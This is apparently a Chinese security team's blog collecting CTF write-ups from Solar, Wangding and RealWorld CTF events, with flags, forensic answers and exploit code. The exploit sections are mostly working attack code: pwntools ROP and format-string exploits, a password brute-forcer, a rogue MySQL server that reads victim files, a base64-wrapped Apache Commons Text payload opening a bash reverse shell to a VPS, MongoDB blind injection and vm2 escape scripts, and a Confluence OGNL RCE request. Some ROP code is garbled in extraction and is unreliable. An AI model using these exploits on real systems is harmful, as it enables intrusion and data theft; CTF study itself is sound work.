Red0

第一届Solar杯应急响应挑战赛部分wp

Mon, 30 Dec 2024 14:07:00 +0800

Red0 2024-12-30 14:07 浙江

1、题目描述

题目文件：tomcat-wireshark.zip/web新手运维小王的Geoserver遭到了攻击：黑客疑似删除了webshell后门，小王找到了可能是攻击痕迹的文件但不一定是正确的，请帮他排查一下。flag格式 flag{xxxx}

2、题目描述

题目文件：tomcat-wireshark.zip/web新手运维小王的Geoserver遭到了攻击：小王拿到了当时被入侵时的流量，其中一个IP有访问webshell的流量，已提取部分放在了两个pcapng中了。请帮他解密该流量。flag格式 flag{xxxx}

E:\应急比赛\【题目】小题+综合题\solar\tomcat-wireshark\web\apache-tomcat-9.0.96\work\Catalina\localhost\ROOT\org\apache\jsp 可以找到明文webshell，看到加密逻辑是aes加密且给出了密钥

flag{sA4hP_89dFh_x09tY_lL4SI4}

aes解密

3、题目描述

题目文件：tomcat-wireshark.zip/web新手运维小王的Geoserver遭到了攻击：小王拿到了当时被入侵时的流量，黑客疑似通过webshell上传了文件，请看看里面是什么。flag格式 flag{xxxx}

解密出来有个包是里传了flag.pdf

cyberchef直接保存为文件打开

flag{dD7g_jk90_jnVm_aPkcs}

4、题目描述

题目附件：mssql、mssql题-备份数据库请找到攻击者创建隐藏账户的时间flag格式如 flag{2024/01/01 00:00:00}

flag{2024/12/16 15:24:21}

windows日志4720

5、题目描述

题目附件：mssql、mssql题-备份数据库请找到恶意文件的名称flag格式如 flag{*.*}

flag{xmrig.exe}

6、题目描述

题目附件：mssql、mssql题-备份数据库请找到恶意文件的外联地址flag格式如 flag{1.1.1.1}

flag{203.107.45.167}

火绒剑监控

7、题目描述

题目附件：mssql、mssql题-备份数据库请修复数据库flag格式如 flag{xxxxx}

flag{E4r5t5y6Mhgur89g}

8、题目描述

题目附件：mssql、mssql题-备份数据库请提交powershell命令中恶意文件的MD5flag格式如 flag{xxxxx}

flag{d72000ee7388d7d58960db277a91cc40}

powershell日志发现恶意命令，套娃套了两层base64，最后一层base64解密保存为文件算md5

解密

base转文件算md5

9、题目描述

题目文件：SERVER-2008-20241220-162057请找到rdp连接的跳板地址flag格式 flag{1.1.1.1}

flag{192.168.60.220}

10、题目描述

题目文件：SERVER-2008-20241220-162057请找到攻击者下载黑客工具的IP地址flag格式 flag{1.1.1.1}

flag{155.94.204.67}

vol导出网络连接

11、题目描述

题目文件：SERVER-2008-20241220-162057攻击者获取的“FusionManager节点操作系统帐户（业务帐户）”的密码是什么flag格式 flag{xxxx}

flag{GalaxManager_2012}

文件扫描发现有个pass.txt

导出查看

12、题目描述

题目文件：SERVER-2008-20241220-162057请找到攻击者创建的用户flag格式 flag{xxxx}

flag{ASP.NET}

13、题目描述

题目文件：SERVER-2008-20241220-162057请找到攻击者利用跳板rdp登录的时间flag格式 flag{2024/01/01 00:00:00}

注意要换一下时区，他的是UTC时区，北京时间是UTC+8

flag{2024/12/21 00:15:34 }

14、题目描述

题目文件：SERVER-2008-20241220-162057请找到攻击者创建的用户的密码哈希值flag格式 flag{XXXX}

flag{5ffe97489cbecle08d0c6339ec39416d}}

15、题目描述

本题作为签到题,请给出邮服发件顺序。Received: from mail.da4s8gag.com ([140.143.207.229])by newxmmxszc6-1.qq.com (NewMX) with SMTP id 6010A8ADfor ; Thu, 17 Oct 2024 11:24:01 +0800X-QQ-mid: xmmxszc6-1t1729135441tm9qrjq3kX-QQ-XMRINFO: NgToQqU5s31XQ+vYT/V7+uk=Authentication-Results: mx.qq.com; spf=none smtp.mailfrom=;dkim=none; dmarc=none(permerror) header.from=solar.secReceived: from mail.solar.sec (VM-20-3-centos [127.0.0.1])by mail.da4s8gag.com (Postfix) with ESMTP id 2EF0A60264for ; Thu, 17 Oct 2024 11:24:01 +0800 (CST)Date: Thu, 17 Oct 2024 11:24:01 +0800To: hellosolartest@qq.comFrom: 鍏嬪競缃戜俊Subject:xxxxxxxxxxMessage-Id: <20241017112401.032146@mail.solar.sec>X-Mailer: QQMail 2.xXXXXXXXXXXflag格式为flag{domain1|...|domainN}

GPT秒了

flag{mail.solar.sec|mail.da4s8gag.com|newxmmxszc6-1.qq.com}

阅读原文

跳转微信打开

第三届网鼎杯半决赛部分wp

Tue, 18 Apr 2023 10:54:00 +0800

原创 Red0 2023-04-18 10:54 浙江

一、突破

SMPP

METADATA文件中有一个example代码，修改绑定IP和端口，输入账号密码。（题干已给出）

然后根据题干要求修改短信内容和源地址、目的地址，依次发送两个短信，刷新8888端口http服务，可以看到flag文件。

import logging            import sys                       import smpplib.gsm            import smpplib.client            import smpplib.consts                       # if you want to know what's happening            logging.basicConfig(level='DEBUG')                       # Two parts, UCS2, SMS with UDH            parts, encoding_flag, msg_type_flag = smpplib.gsm.make_parts(u'Привет мир!\n'*10)                       client = smpplib.client.Client('example.com', SOMEPORTNUMBER, allow_unknown_opt_params=True)                       # Print when obtain message_id            client.set_message_sent_handler(                lambda pdu: sys.stdout.write('sent {} {}\n'.format(pdu.sequence, pdu.message_id)))            client.set_message_received_handler(                lambda pdu: sys.stdout.write('delivered {}\n'.format(pdu.receipted_message_id)))                       client.connect()            client.bind_transceiver(system_id='login', password='secret')                       for part in parts:                pdu = client.send_message(                    source_addr_ton=smpplib.consts.SMPP_TON_INTL,                    #source_addr_npi=smpplib.consts.SMPP_NPI_ISDN,                    # Make sure it is a byte string, not unicode:                    source_addr='SENDERPHONENUM',                               dest_addr_ton=smpplib.consts.SMPP_TON_INTL,                    #dest_addr_npi=smpplib.consts.SMPP_NPI_ISDN,                    # Make sure thease two params are byte strings, not unicode:                    destination_addr='PHONENUMBER',                    short_message=part,                               data_coding=encoding_flag,                    esm_class=msg_type_flag,                    registered_delivery=True,                )                print(pdu.sequence)                           # Enters a loop, waiting for incoming PDUs            client.listen()

二、共同防御

地址计算

掩码为255.255.0.0，网络地址取前16位，后16位置0，得到网络地址为：172.30.0.0，使用md5加密得到答案为：e945964770a0fd6f0dbbcd9622f2e63f。

ospf密钥获取

从pcap包中提取ospf密码hash值，借助kali的john工具进行md5爆破后即可得到密码。

答案即为flag{yuio}

短信中心密码爆破

编写smpplib登录脚本，遍历密码字典中的密码，若登录异常则继续爆破，直到登录无异常，即得到正确的密码。

import logging            import sys                       import smpplib.gsm            import smpplib.client            import smpplib.consts                       # if you want to know what's happening            logging.basicConfig(level='DEBUG')                       # Two parts, UCS2, SMS with UDH            parts, encoding_flag, msg_type_flag = smpplib.gsm.make_parts(u'Привет мир!\n'*10)                       client = smpplib.client.Client('172.16.9.37', 2776, allow_unknown_opt_params=True)                       # Print when obtain message_id            client.set_message_sent_handler(                lambda pdu: sys.stdout.write('sent {} {}\n'.format(pdu.sequence, pdu.message_id)))            client.set_message_received_handler(                lambda pdu: sys.stdout.write('delivered {}\n'.format(pdu.receipted_message_id)))                       client.connect()            with open ('password_dict.txt','r')as f:                for i in f.readlines():                    i=i.strip()                    try:                        client.bind_transceiver(system_id='admin', password=i)                        print(i)                        break                    except:                        continue

答案为flag{sikx}

三、RHG（人工智能漏洞挖掘）

RHG部分我们没有准备自动化工具，全靠手速。

由于本次rhg题目大多为静态编译且去符号，为了更方便直观进行程序分析，我们在赛前下载了对应版本的sig（libc6_2.23-0ubuntu3_i386.sig）放入IDA安装目录的sig/pc目录下，在使用IDA分析时可导入sig，可自动帮助识别libc函数。

pwn02

和上午测试的pwn01一样，简单的栈溢出。

直接ropchain一把梭。使用ROPgadget得到rop链后构造exp。

ROPgadget --binary r2 --ropchain

from pwn import *from struct import *
sh=process('./r2')sh.recv()p=b'a'*0x6c
p += pack('# pop edx ; retp += pack('# @ .datap += pack('# pop eax ; retp += b'/bin'p += pack('# mov dword ptr [edx], eax ; retp += pack('# pop edx ; retp += pack('# @ .data + 4p += pack('# pop eax ; retp += b'//sh'p += pack('# mov dword ptr [edx], eax ; retp += pack('# pop edx ; retp += pack('# @ .data + 8p += pack('# xor eax, eax ; retp += pack('# mov dword ptr [edx], eax ; retp += pack('# pop ebx ; retp += pack('# @ .datap += pack('# pop ecx ; retp += pack('# @ .data + 8p += pack('# pop edx ; retp += pack('# @ .data + 8p += pack('# xor eax, eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# int 0x80
sh.sendline(p)sh.interactive()

pwn03

溢出点和pwn02一样，但是加了限制，payload中不能有BINSHbinsh中的任意字符。

通过read函数将/bin/sh写入bss段中，再使用系统调用执行execve即可获得shell。

from pwn import *            from struct import pack                       pop_eax=0x080b8f16            int80=0x0806d4a3            pop_ebx=0x080481c9            pop_ecx=0x080df91d            pop_edx=0x0806f89b            read=0x0806DE00            main=0x80488CE            bss=0x080EBF80                       sh=process('./r3')            sh.recv()            p=b'a'*0x74+p32(read)+p32(main)+p32(0)+p32(bss)+p32(8)            sh.send(p)            sh.recv()            sh.send(b"/bin/sh\x00")            p=b'a'*0x74            p+=flat([pop_eax,0xb,pop_ebx,bss,pop_ecx,0,pop_edx,0,int80])            sh.send(p)            sh.interactive()

pwn04

存在栈溢出点和后门函数，修改ret地址为shell地址即可。

from pwn import *            sh=process('./r4')            shell=0x080485BD            sh.recv()            payload=b'a'*0x6c+p32(shell)            sh.send(payload)            sh.interactive()

pwn05

根据代码可知，v0为输入字符串的第16个字符后的字符串，转为整数后+5计算得到，即为输入任意16个字符后，输入85140即可获得shell。

from pwn import *            sh=process('./r5')            payload='1'*16+'85140'            sh.send(payload)            sh.interactive()

pwn06

和pwn05逻辑差不多，输入12345即可拿到shell。

pwn07

分析下来其实是一道嵌套了后门函数的迷宫题，从后门函数一步步回溯到入口函数，倒推回去即可得到正确的路径。

......

得到路径为：WSDWAAWDW

from pwn import *            sh=process('./r7')            sh.recv()            sh.send('WSDWAAWDW')            sh.interactive()

pwn08

格式化字符串漏洞，利用pwntools的工具将0x80ebf9c处的变量改为28即可得到shell。

from pwn import *            sh=process('./r8')            sh.recv()            context.arch = 'i386'            payload=fmtstr_payload(4,{0x80ebf9c:28},0,write_size='byte')            sh.send(payload)            sh.interactive()

pwn09

通过整数溢出绕过长度限制，构造长度为263的输入，263转为int8后由于溢出会变成7，strcpy即可造成v2缓冲区溢出。

from pwn import *from struct import pack
sh=process('./r9')sh.recv()sh.sendline('1')sh.recv()p=b'a'*29p += pack('# pop edx ; retp += pack('# @ .datap += pack('# pop eax ; retp += b'/bin'p += pack('# mov dword ptr [edx], eax ; retp += pack('# pop edx ; retp += pack('# @ .data + 4p += pack('# pop eax ; retp += b'//sh'p += pack('# mov dword ptr [edx], eax ; retp += pack('# pop edx ; retp += pack('# @ .data + 8p += pack('# xor eax, eax ; retp += pack('# mov dword ptr [edx], eax ; retp += pack('# pop ebx ; retp += pack('# @ .datap += pack('# pop ecx ; retp += pack('# @ .data + 8p += pack('# pop edx ; retp += pack('# @ .data + 8p += pack('# xor eax, eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# inc eax ; retp += pack('# int 0x80p+=b'\x90'*102sh.send(p)print(len(p))sh.interactive()

pwn10

IDA分析程序，发现输入0时，会调用后门函数。

直接输入0即可获得shell。

四、RDG（实景防御）

babyshell

漏洞：free指针后未置空、堆内写入大小未作限制。

修复：

1.将free后的指针清空。

2.对写入堆中的长度做限制。

babymaze

分析程序发现为迷宫题，并且可以对迷宫中所在位置的值进行修改。

迷宫如下所示，2为墙，由于四周的墙不完全封闭，可以导致坐标溢出到迷宫之外的地址，实现任意地址覆盖。

[2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]            [0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]            [0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]            [0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]            [0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]            [0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 9, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0]            [0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]            [0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0]            [2, 0, 0, 0, 2, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0]

修复方式即对坐标进行校验，如超出迷宫范围则退出。

在eh_frame段增加校验代码：

阅读原文

跳转微信打开

RealWorld CTF（体验赛）部分WP

Mon, 09 Jan 2023 17:58:00 +0800

原创 Red0 2023-01-09 17:58 浙江

0x1 羊了拼羊

签到题。js代码搜索ctf找到flag

0x2 Evil Mysql Server

Mysql恶意服务器读取文件的漏洞。可构建一个恶意的myql服务器读取靶机上的/flag文件。在github找到注册恶意mysql服务器的脚本，修改脚本中读取的文件为/flag。

#!/usr/bin/env python#coding: utf8
import socketimport asyncoreimport asynchatimport structimport randomimport loggingimport logging.handlers
PORT = 3306
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))log.addHandler(    tmp_format)
filelist = (    '/flag',)

#================================================#=======No need to change after this lines=======#================================================
__author__ = 'Gifts'
def daemonize():    import os, warnings    if os.name != 'posix':        warnings.warn('Cant create daemon on non-posix system')        return
    if os.fork(): os._exit(0)    os.setsid()    if os.fork(): os._exit(0)    os.umask(0o022)    null=os.open('/dev/null', os.O_RDWR)    for i in xrange(3):        try:            os.dup2(null, i)        except OSError as e:            if e.errno != 9: raise    os.close(null)

class LastPacket(Exception):    pass

class OutOfOrder(Exception):    pass

class mysql_packet(object):    packet_header = struct.Struct(')    packet_header_long = struct.Struct(')    def __init__(self, packet_type, payload):        if isinstance(packet_type, mysql_packet):            self.packet_num = packet_type.packet_num + 1        else:            self.packet_num = packet_type        self.payload = payload
    def __str__(self):        payload_len = len(self.payload)        if payload_len < 65536:            header = mysql_packet.packet_header.pack(payload_len, 0, self.packet_num)        else:            header = mysql_packet.packet_header.pack(payload_len & 0xFFFF, payload_len >> 16, 0, self.packet_num)
        result = "{0}{1}".format(            header,            self.payload        )        return result
    def __repr__(self):        return repr(str(self))
    @staticmethod    def parse(raw_data):        packet_num = ord(raw_data[0])        payload = raw_data[1:]
        return mysql_packet(packet_num, payload)

class http_request_handler(asynchat.async_chat):
    def __init__(self, addr):        asynchat.async_chat.__init__(self, sock=addr[0])        self.addr = addr[1]        self.ibuffer = []        self.set_terminator(3)        self.state = 'LEN'        self.sub_state = 'Auth'        self.logined = False        self.push(            mysql_packet(                0,                "".join((                    '\x0a',  # Protocol                    '5.6.28-0ubuntu0.14.04.1' + '\0',                    '\x2d\x00\x00\x00\x40\x3f\x59\x26\x4b\x2b\x34\x60\x00\xff\xf7\x08\x02\x00\x7f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68\x69\x59\x5f\x52\x5f\x63\x55\x60\x64\x53\x52\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00',                ))            )        )
        self.order = 1        self.states = ['LOGIN', 'CAPS', 'ANY']
    def push(self, data):        log.debug('Pushed: %r', data)        data = str(data)        asynchat.async_chat.push(self, data)
    def collect_incoming_data(self, data):        log.debug('Data recved: %r', data)        self.ibuffer.append(data)
    def found_terminator(self):        data = "".join(self.ibuffer)        self.ibuffer = []
        if self.state == 'LEN':            len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1            if len_bytes < 65536:                self.set_terminator(len_bytes)                self.state = 'Data'            else:                self.state = 'MoreLength'        elif self.state == 'MoreLength':            if data[0] != '\0':                self.push(None)                self.close_when_done()            else:                self.state = 'Data'        elif self.state == 'Data':            packet = mysql_packet.parse(data)            try:                if self.order != packet.packet_num:                    raise OutOfOrder()                else:                    # Fix ?                    self.order = packet.packet_num + 2                if packet.packet_num == 0:                    if packet.payload[0] == '\x03':                        log.info('Query')
                        filename = random.choice(filelist)                        PACKET = mysql_packet(                            packet,                            '\xFB{0}'.format(filename)                        )                        self.set_terminator(3)                        self.state = 'LEN'                        self.sub_state = 'File'                        self.push(PACKET)                    elif packet.payload[0] == '\x1b':                        log.info('SelectDB')                        self.push(mysql_packet(                            packet,                            '\xfe\x00\x00\x02\x00'                        ))                        raise LastPacket()                    elif packet.payload[0] in '\x02':                        self.push(mysql_packet(                            packet, '\0\0\0\x02\0\0\0'                        ))                        raise LastPacket()                    elif packet.payload == '\x00\x01':                        self.push(None)                        self.close_when_done()                    else:                        raise ValueError()                else:                    if self.sub_state == 'File':                        log.info('-- result')                        log.info('Result: %r', data)
                        if len(data) == 1:                            self.push(                                mysql_packet(packet, '\0\0\0\x02\0\0\0')                            )                            raise LastPacket()                        else:                            self.set_terminator(3)                            self.state = 'LEN'                            self.order = packet.packet_num + 1
                    elif self.sub_state == 'Auth':                        self.push(mysql_packet(                            packet, '\0\0\0\x02\0\0\0'                        ))                        raise LastPacket()                    else:                        log.info('-- else')                        raise ValueError('Unknown packet')            except LastPacket:                log.info('Last packet')                self.state = 'LEN'                self.sub_state = None                self.order = 0                self.set_terminator(3)            except OutOfOrder:                log.warning('Out of order')                self.push(None)                self.close_when_done()        else:            log.error('Unknown state')            self.push('None')            self.close_when_done()

class mysql_listener(asyncore.dispatcher):    def __init__(self, sock=None):        asyncore.dispatcher.__init__(self, sock)
        if not sock:            self.create_socket(socket.AF_INET, socket.SOCK_STREAM)            self.set_reuse_addr()            try:                self.bind(('', PORT))            except socket.error:                exit()
            self.listen(5)
    def handle_accept(self):        pair = self.accept()
        if pair is not None:            log.info('Conn from: %r', pair[1])            tmp = http_request_handler(pair)

z = mysql_listener()# daemonize()asyncore.loop()

在vps上开启恶意mysql服务器，在web页面填写恶意服务器地址，在vps的mysql.log即可读取flag。

0x3 Be-a-Language-Expert

thinkphp6 多语言文件包含漏洞。

写入webshell

蚁剑连接

readflag

0x4 Apache Commons Text

Apache Commons Text远程代码执行漏洞。通过分析可知，后端做了一些黑名单策略。不允许出现script、file等字符串。

base64函数可用，编码后能被执行，但无回显

${base64Decoder:JHtzY3JpcHQ6anM6amF2YS5sYW5nLlJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMoImxzIikudG9TdHJpbmcoKX0=}

对如下payload进行base64加密：

${script:js:java.lang.Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/vps_ip/2333 0>&1")}

反弹shell成功

readflag

0x5 Yummy Api

默认账号密码 admin@admin.com/ymfe.org。先尝试了一下添加接口高级Mock脚本命令执行，没成功。

尝试mongodb注入获取token，从而实现vm逃逸。

先盲注获得token：

import requeststokenletter = "0123456789abcedf"url1 = "http://47.98.161.119:9090/api/project/get"token = ""for i in range(16):    for j in tokenletter:        body = {"token":{"$regex":"^" + token + j}}        resp = requests.get(url=url1,json=body,verify=False)        if "406" in resp.text:            print(body)            token += j            print(token)#8fa743801266b2391d16

得到token为8fa743801266b2391d16。

aes192加密token得到uidtoken，遍历id发现id=11时有数据

写脚本获取加密后的uidtoken

const crypto = require('crypto');
uid = "11"token = "8fa743801266b2391d16"data = uid + "|" + token
password = "abcde"
// 如下方法使用指定的算法与密码来创建cipher对象const cipher = crypto.createCipher('aes192', password);
// 使用该对象的update方法来指定需要被加密的数据let crypted = cipher.update(data, 'utf-8', 'hex');
crypted += cipher.final('hex');
console.log(crypted)

‍

得到加密后的token为：

043454c1c1399255295ebf2fff47e5cc494108968ad05f848627c334d91ad2bc

接着上传vm逃逸脚本

import requestsimport re
token = "043454c1c1399255295ebf2fff47e5cc494108968ad05f848627c334d91ad2bc"url = f'http://47.98.161.119:9090/api/project/up?token={token}'headers = {    "content-type":"application/json"}vm2Script = """const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("/readflag").toString()context.responseData = 'testtest' + mockJson + 'testtest'console.log(responseData)"""body_json = {"id":11,"pre_script":"","after_script":vm2Script}
print(body_json)id = 1while id:    body_json["id"] = id ## 项目id 需要枚举    resp = requests.post(url=url,headers=headers,json=body_json)    print(resp.status_code)    print(resp.text)    if resp.status_code == 200 and re.search("\"errcode\":0",resp.text):        print("[*] pre-response 脚本上传成功")        id = False    else:        print("[*] pre-response 脚本上传失败")        id+=1#id=66时成功

最后触发漏洞得到flag

import requestsimport re
token = "043454c1c1399255295ebf2fff47e5cc494108968ad05f848627c334d91ad2bc"
id = 1
while id:    url =f'http://47.98.161.119:9090/api/open/run_auto_test?id={id}&token={token}&mode=html'    resp = requests.get(url=url)    if re.search("YAPI",resp.text) and re.search("",resp.text):        print("[*] 命令执行成功")        # print(url)        print("===")        print(id)        print(re.search("testtest[\s\S]*testtest",resp.text)[0])        id = False        break    print(url)    id += 1 
exit()

0x6 Be-a-Wiki-Hacker

Atlassian Confluence远程代码执行漏洞

payload如下：

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20/flag%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1

0x7 babycurve

本题为椭圆曲线求解问题。当u=w时，3*u*w + 4*u + 1 = 3u^2 + 4u + 1，从而可以知道椭圆曲线公式为：y^2 = x^3 + 2x^2 + x + C，带入点（4,10），可得C=0，即椭圆曲线公式为：y^2 = x^3 + 2x^2 + x = x(x^2+2x+1) = x(x+1)^2，为奇异椭圆曲线，根据其性质，可将奇异椭圆曲线上的点构成的群映射到有限域上的乘法群中。

在github找了一个现成的脚本，将点P(4,10)和加密后的点Q映射到有限域上的数mapP、mapQ，从而将椭圆曲线求解转化为有限域上的离散对数求解，使用sage可解得x。

p = 193387944202565886198256260591909756041PP = PolynomialRing(GF(p), 'x')x = PP.gens()[0]f = x^3 + 2*x^2 + xf_ = f.subs(x=x-1)root = f_.factor()[0][0][0]
def trans(P):    P_ = (P[0] +1, P[1])    t = GF(p)(root).square_root()    res = (P_[1] + t*P_[0])/(P_[1] - t*P_[0]) % p    return res
mapP = trans((4, 10))mapQ = trans((65639504587209705872811542111125696405, 125330437930804525313353306745824609665))print(mapQ.log(mapP))

用求出的x解密发现flag乱码，考虑到可能存在多解情况，尝试不同的x进行AES解密，最后得到flag。

#!/usr/bin/env python3# coding=utf-8
from Crypto.Cipher import AES
p = 193387944202565886198256260591909756041ctext = bytes.fromhex('b3669dc657cef9dc17db4de5287cd1a1e8a48184ed9746f4c52d3b9f8186ec046d6fb1b8ed1b45111c35b546204b68e0')
def test(x):    aes = AES.new(x.to_bytes(16, 'big'), AES.MODE_CBC, bytes(16))    flag = aes.decrypt(ctext)    if b'rwctf' in flag:        print(flag)
x = 4470735776084208177429085432176719338while x < p:    test(x)    x += (p-1) // 4

0x8 Snake

使用jeb逆向分析发现本程序为贪吃蛇游戏，蛇的每一截身体都是一个从资源列表中选取的png图像。一开始为随机图像，蛇超过一定长度后开始新增固定图像。固定图像共22个，每次从17个图像中选取（b0.png~b16.png，为17个ASCII字符的图像）。

所选图像的下标通过一段brainfuck代码计算得到，brainfuck关键代码如下：

该brainfuck代码将'['、']'和'<'、'>'字符的含义进行了交换。模拟执行该代码得到23个数，根据程序逻辑去掉第一个，剩下的22个即为下标，以此选取对应的字母图像，组合得到的字符串，再以rwctf{}包上即为flag：rwctf{K33PG01NGD0N0TG1V3UPPP}。

阅读原文

跳转微信打开

2022网鼎杯白虎组部分wp（新增re-junk）

Tue, 30 Aug 2022 08:30:00 +0800

原创 Red0 2022-08-30 08:30 浙江

0x0 junk

(本题为赛后解出，特此补上wp)

阶段一

使用IDA分析本题，发现存在花指令

